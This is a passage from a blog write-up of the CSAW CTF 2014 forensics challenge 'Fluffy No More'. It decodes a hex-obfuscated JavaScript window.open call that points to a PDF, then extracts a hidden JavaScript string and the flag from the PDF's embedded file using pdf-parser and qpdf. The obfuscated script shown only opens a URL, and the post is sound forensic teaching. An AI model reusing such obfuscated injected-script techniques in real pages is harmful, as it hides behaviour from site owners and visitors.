<span class="n">window</span><span class="p">[</span><span class="n">_0x91fe</span><span class="p">[</span><span class="mi">2</span><span class="p">]](</span><span class="n">_0x91fe</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">_0x91fe</span><span class="p">[</span><span class="mi">1</span><span class="p">]);</span>
</pre></div>


<p>We decode it using Python or a <a href="http://ddecode.com/hexdecoder/">online hex-decode</a> and we get another file:</p>
<div class="highlight"><pre><span class="o">&gt;&gt;&gt;</span> <span class="k">print</span><span class="p">(</span><span class="s">&quot;</span><span class="se">\x68\x74\x74\x70\x3A\x2F\x2F\x31\x32\x38\x2E\x32\x33\x38\x2E\x36\x36\x2E\x31\x30\x30\x2F\x61\x6E\x6E\x6F\x75\x6E\x63\x65\x6D\x65\x6E\x74\x2E\x70\x64\x66</span><span class="s">&quot;</span><span class="p">,</span> <span class="s">&quot;</span><span class="se">\x5F\x73\x65\x6C\x66</span><span class="s">&quot;</span><span class="p">,</span> <span class="s">&quot;</span><span class="se">\x6F\x70\x65\x6E</span><span class="s">&quot;</span><span class="p">)</span>
<span class="p">(</span><span class="s">&#39;http://128.238.66.100/announcement.pdf&#39;</span><span class="p">,</span> <span class="s">&#39;_self&#39;</span><span class="p">,</span> <span class="s">&#39;open&#39;</span><span class="p">)</span>
</pre></div>


<p>Opening the URL leads to this picture:
<img alt="" src="http://i.imgur.com/CNEQhfG.png" /></p>
<p>LOL. Funny, but no flag yet...</p>
<p>It should be in the PDF somewhere!</p>
<hr />
<h2>Finding the Second Hex-encoded String: Approach I</h2>
<p>All right, let's use what we learned from the <a href="http://bt3gl.github.io/forensics-200-obscurity.html">CSAW CTF 2014 Forensic -Obscurity</a> problem. First, let's see if we find the flag with a simple grep:</p>
<div class="highlight"><pre><span class="nv">$.</span>/pdf-parser.py announcement.pdf | grep flag
<span class="nv">$.</span>/pdf-parser.py announcement.pdf | grep key
</pre></div>


<p>No luck. Let us ID the file to see if we find any funny stream:</p>
<div class="highlight"><pre><span class="nv">$ </span>./pdfid.py announcement.pdf PDFiD 0.1.2 announcement.pdf
 PDF Header: %PDF-1.4
 obj                    9
 endobj                 9
 stream                 4
 endstream              4
 xref                   1
 trailer                1
 startxref              1
 /Page                  1
 /Encrypt               0
 /ObjStm                0
 /JS                    0
 /JavaScript            0
 /AA                    0
 /OpenAction            0
 /AcroForm              0
 /JBIG2Decode           0
 /RichMedia             0
 /Launch                0
 /EmbeddedFile          1
 /XFA                   0
 /Colors &gt; 2^24         0
</pre></div>


<p>Oh, cool, there is a <strong>Embedded File</strong>! Let's look closer to this object:</p>
<div class="highlight"><pre><span class="nv">$ </span>./pdf-parser.py --stats announcement.pdf Comment: 3
XREF: 1
Trailer: 1
StartXref: 1
Indirect object: 9
  2: 3, 7
 /Catalog 1: 6
 /EmbeddedFile 1: 8
 /Filespec 1: 9
 /Page 1: 5
 /Pages 1: 4
 /XObject 2: 1, 2
</pre></div>


<p>Nice. So now we can decode our pdf file using the <strong>object code</strong>, which we can see  above that is <strong>8</strong>:</p>
<div class="highlight"><pre><span class="nv">$ </span>./pdf-parser.py --object 8 --raw --filter announcement.pdf
obj 8 0
 Type: /EmbeddedFile
 Referencing:
 Contains stream

  &lt;&lt;
    /Length 212
    /Type /EmbeddedFile
    /Filter /FlateDecode
    /Params
      &lt;&lt;
        /Size 495
        /Checksum &lt;7f0104826bde58b80218635f639b50a9&gt;
      &gt;&gt;
    /Subtype /application/pdf
  &gt;&gt;

 var <span class="nv">_0xee0b</span><span class="o">=[</span><span class="s2">&quot;\x59\x4F\x55\x20\x44\x49\x44\x20\x49\x54\x21\x20\x43\x4F\x4E\x47\x52\x41\x54\x53\x21\x20\x66\x77\x69\x77\x2C\x20\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x20\x6F\x62\x66\x75\x73\x63\x61\x74\x69\x6F\x6E\x20\x69\x73\x20\x73\x6F\x66\x61\x20\x6B\x69\x6E\x67\x20\x64\x75\x6D\x62\x20\x20\x3A\x29\x20\x6B\x65\x79\x7B\x54\x68\x6F\x73\x65\x20\x46\x6C\x75\x66\x66\x79\x20\x42\x75\x6E\x6E\x69\x65\x73\x20\x4D\x61\x6B\x65\x20\x54\x75\x6D\x6D\x79\x20\x42\x75\x6D\x70\x79\x7D&quot;</span><span class="o">]</span>;var <span class="nv">y</span><span class="o">=</span>_0xee0b<span class="o">[</span>0<span class="o">]</span>;
</pre></div>


<p>Which <em>finally</em> leads to our flag!</p>
<div class="highlight"><pre><span class="o">&gt;&gt;&gt;</span> <span class="k">print</span><span class="p">(</span><span class="s">&quot;</span><span class="se">\x59\x4F\x55\x20\x44\x49\x44\x20\x49\x54\x21\x20\x43\x4F\x4E\x47\x52\x41\x54\x53\x21\x20\x66\x77\x69\x77\x2C\x20\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x20\x6F\x62\x66\x75\x73\x63\x61\x74\x69\x6F\x6E\x20\x69\x73\x20\x73\x6F\x66\x61\x20\x6B\x69\x6E\x67\x20\x64\x75\x6D\x62\x20\x20\x3A\x29\x20\x6B\x65\x79\x7B\x54\x68\x6F\x73\x65\x20\x46\x6C\x75\x66\x66\x79\x20\x42\x75\x6E\x6E\x69\x65\x73\x20\x4D\x61\x6B\x65\x20\x54\x75\x6D\x6D\x79\x20\x42\x75\x6D\x70\x79\x7D</span><span class="s">&quot;</span><span class="p">)</span>
<span class="n">YOU</span> <span class="n">DID</span> <span class="n">IT</span><span class="err">!</span> <span class="n">CONGRATS</span><span class="err">!</span> <span class="n">fwiw</span><span class="p">,</span> <span class="n">javascript</span> <span class="n">obfuscation</span> <span class="ow">is</span> <span class="n">sofa</span> <span class="n">king</span> <span class="n">dumb</span>  <span class="p">:)</span> <span class="n">key</span><span class="p">{</span><span class="n">Those</span> <span class="n">Fluffy</span> <span class="n">Bunnies</span> <span class="n">Make</span> <span class="n">Tummy</span> <span class="n">Bumpy</span><span class="p">}</span>
</pre></div>


<hr />
<h2>Finding the Second Hex-encoded String: Approach II</h2>
<p>There is a nice tool called <a href="http://qpdf.sourceforge.net/">qpdf</a> that can be very useful here:</p>
<div class="highlight"><pre><span class="nv">$ </span>sudp yum install qpdf
</pre></div>


<p>Now, we just do the following conversion:</p>
<div class="highlight"><pre><span class="nv">$ </span>qpdf  --qdf  announcement.pdf  unpacked.pdf
</pre></div>


<p>Opening <em>unpacket.pdf</em> with <a href="http://tarot.freeshell.org/leafpad/">l3afpad</a> also leads to the flag :</p>
<div class="highlight"><pre><span class="n">stream</span>
<span class="n">var</span> <span class="n">_0xee0b</span><span class="o">=</span><span class="p">[</span><span class="s">&quot;</span><span class="se">\x59\x4F\x55\x20\x44\x49\x44\x20\x49\x54\x21\x20\x43\x4F\x4E\x47\x52\x41\x54\x53\x21\x20\x66\x77\x69\x77\x2C\x20\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x20\x6F\x62\x66\x75\x73\x63\x61\x74\x69\x6F\x6E\x20\x69\x73\x20\x73\x6F\x66\x61\x20\x6B\x69\x6E\x67\x20\x64\x75\x6D\x62\x20\x20\x3A\x29\x20\x6B\x65\x79\x7B\x54\x68\x6F\x73\x65\x20\x46\x6C\x75\x66\x66\x79\x20\x42\x75\x6E\x6E\x69\x65\x73\x20\x4D\x61\x6B\x65\x20\x54\x75\x6D\x6D\x79\x20\x42\x75\x6D\x70\x79\x7D</span><span class="s">&quot;</span><span class="p">];</span><span class="n">var</span> <span class="n">y</span><span class="o">=</span><span class="n">_0xee0b</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
<span class="n">endstream</span>
<span class="n">endobj</span>
</pre></div>


<hr />
<p><strong>That's it! Hack all the things!</strong></p>
                </div><!-- /.entry-content -->
                <div class="comments">
                <h2>Comments !</h2>
                        <div id="disqus_thread"></div>
                        <script type="text/javascript">
                           var disqus_identifier = "csaw-ctf-2014-forensics-300-fluffy-no-more.html";
                           (function() {
                                var dsq = document.createElement('script');
                                dsq.type = 'text/javascript'; dsq.async = true;
                                dsq.src = 'http://bt3gl.disqus.com/embed.js';
                                (document.getElementsByTagName('head')[0] ||
                                 document.getElementsByTagName('body')[0]).appendChild(dsq);
                          })();
                        </script>
                </div>
        </article>
</section>
        </div><!--/span-->


      </div><!--/row-->



      <footer>
        <address id="about">

        </address><!-- /#about -->

      </footer>

    </div><!--/.fluid-container-->


    <script src="./theme/js/jquery-1.7.2.min.js"></script>
    <script src="./theme/js/bootstrap.min.js"></script>
  </body>
</html>